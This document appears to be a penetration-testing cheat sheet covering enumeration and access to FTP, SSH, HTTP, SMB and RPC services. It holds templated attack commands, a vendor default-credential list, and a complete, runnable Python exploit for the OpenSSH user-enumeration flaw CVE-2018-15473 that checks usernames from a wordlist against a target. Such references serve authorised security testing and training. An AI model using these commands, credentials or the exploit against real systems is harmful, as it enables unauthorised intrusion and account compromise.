Network Services

FTP

Anonymous login

ftp anonymous@<target>  # No password needed

Auto login

sshpass -p '<password>' ftp <user>@<target>

Browser URL

ftp://<user>:<password>@<target>

SSL

lftp <target> -e "set ssl:verify-certificate no; set ftp:ssl-force true"

Download all files

wget -r --user='<user>' --password='<password>' ftp://<target>

SSH

Default credentials

Check for default credentials depending on the vendor:

Vendor	Usernames	Passwords
APC	apc, device	apc
Brocade	admin	admin123, password, brocade, fibranne
Cisco	admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin	admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme
Citrix	root, nsroot, nsmaint, vdiadmin, kvm, cli, admin	C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler
D-Link	admin, user	private, admin, user
Dell	root, user1, admin, vkernel, cli	calvin, 123456, password, vkernel, Stor@ge!, admin
EMC	admin, root, sysadmin	EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc
HP/3Com	admin, root, vcx, app, spvar, manage, hpsupport, opc_op	admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin
Huawei	admin, root	123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123
IBM	USERID, admin, manager, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, system, device, ufmcli, customer	PASSW0RD, passw0rd, admin, password, Passw8rd, iadmin, apc, 123456, cust0mer
Juniper	netscreen	netscreen
NetApp	admin	netapp123
Oracle	root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user	changeme, ilom-admin, ilom-operator, welcome1, oracle
VMware	vi-admin, root, hqadmin, vmware, admin	vmware, vmw@re, hqadmin, default

https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh#default-credentials

Auto login

sshpass -p '<password>' ssh <user>@<target>

Private key login

ssh -i id_rsa <user>@<target>

Generate RSA keys

ssh-keygen -t rsa -f id_rsa

User enumeration - OpenSSH <7.7

Any version of OpenSSH up to 7.7 is vulnerable to user enumeration (CVE-2018-15473) if not patched. To exploit this vulnerability, we can use the following script:

ssh_user_enum.py

#!/usr/bin/env python2

import argparse
import logging
import paramiko
import socket
import sys
from colorama import init, Fore
from threading import Thread, current_thread, enumerate as enumerate_threads

class SSHUserChecker:
    def __init__(self, target, port=22):
        self.target = target
        self.port = port

        # Remove paramiko logging
        logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

        # Assign functions to respective handlers
        self._old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
        paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = self._service_accept
        paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = self._invalid_username

    def _service_accept(self, *args, **kwargs):
        paramiko.message.Message.add_boolean = self._add_boolean
        return self._old_service_accept(*args, **kwargs)

    def _add_boolean(self, *args, **kwargs):
        pass

    def _invalid_username(self, *args, **kwargs):
        raise InvalidUsername()

    def check_user(self, username):
        sock = socket.socket()
        sock.connect((self.target, self.port))
        transport = paramiko.transport.Transport(sock)

        try:
            transport.start_client()
        except paramiko.ssh_exception.SSHException:
            print (Fore.RED + '\n[!] Failed to negotiate SSH transport for user:' + username)
            return False

        try:
            transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
        except InvalidUsername:
            return False
        except paramiko.ssh_exception.AuthenticationException:
            return True
        return False

class InvalidUsername(Exception):
    pass

def check_user_wrapper(user_checker, username, valid_users, invalid_users):
    if user_checker.check_user(username):
        valid_users.append(username)
    else:
        invalid_users.append(username)

def main():
    parser = argparse.ArgumentParser(description='SSH User Enumeration')
    parser.add_argument('-u', '--username', help="Username to check for validity.")
    parser.add_argument('-w', '--wordlist', help="Wordlist file containing usernames to check.")
    parser.add_argument('-p', '--port', type=int, default=22, help="Set port of SSH service")
    parser.add_argument('target', help="IP address of the target system")

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    args = parser.parse_args()

    user_checker = SSHUserChecker(args.target, args.port)
    valid_users = []
    invalid_users = []

    if args.wordlist:
        with open(args.wordlist, 'r') as f:
            for line in f:
                username = line.strip()
                t = Thread(target=check_user_wrapper, args=(user_checker, username, valid_users, invalid_users))
                t.start()
    else:
        if not args.username:
            parser.error("[!] You must specify either a username (-u) or a wordlist (-w).")
        else:
            t = Thread(target=check_user_wrapper, args=(user_checker, args.username, valid_users, invalid_users))
            t.start()

    # Esperar a que todos los hilos terminen
    for t in enumerate_threads():
        if t != current_thread():
            t.join()

    if args.wordlist:
        if valid_users:
            print(Fore.GREEN + "\n[+] Valid users:")
            for user in valid_users:
                print(Fore.GREEN + "{}".format(user))
        else:
            print(Fore.RED + "\n[-] No valid users found.")
    else:
        if valid_users:
            print(Fore.GREEN + "\n[+] Valid user: {}".format(args.username))
        else:
            print(Fore.RED + "\n[-] Invalid user: {}".format(args.username))

if __name__ == "__main__":
    main()

HTTP/HTTPS

Web Technologies

whatweb http://<target>

Apps - Wappalyzer

I also recommend using this browser extension.

File and Directory Enumeration

nmap -p80,443 --script http-enum <target>

gobuster dir -u http://<target>/ -w wordlist.txt

wfuzz -w wordlist.txt http://<target>/FUZZ

# Good option for BurpSuite requests
ffuf -request request.txt -w wordlist.txt http://<target>/

Subdomain Enumeration

gobuster vhost -u http://<target>/ -w wordlist.txt

wfuzz -H 'Host: FUZZ.<target>' -w wordlist.txt http://<target>/

User input

Web Vulnerabilities

SMB

System enumeration with enum4linux

enum4linux -a [-u '<user>' -p '<password>'] <target>

Shares Enumeration

smbclient

# null session
smbclient -N -L //<target>
# authenticated
smbclient -U '<user>[%<password>]' -L //<target>
# conect to a share
smbclient [-U '<user>[%<password>]'] //<target>/share

smbmap

# null session
smbmap -H <target>
# authenticated
smbmap -u '<user>' -p '<password>' -H <target>
# recursive/non-recursive listing
smbmap [-u '<user>' -p '<password>'] -R/-r share -H <target>

netexec

# null session
nxc smb <target> -u '' -p '' --shares
# authenticated
nxc smb <target> -u '<user>' -p '<password>' --shares
# List share
nxc smb <target> [-u '<user>' -p '<password>'] --share share

nmap

nmap -p 139,445 --script "smb-enum-shares" <target>

RPC

Automated Enumeration

rpcdump.py <target>

Manual Enumeration

# null session
rpcclient -U '' -N <target>
# authenticated
rpcclient -U '<user>%<password>' -N <target>
# commands
rpcclient -U '[<user>%<password>]' -N <target> -c 'command'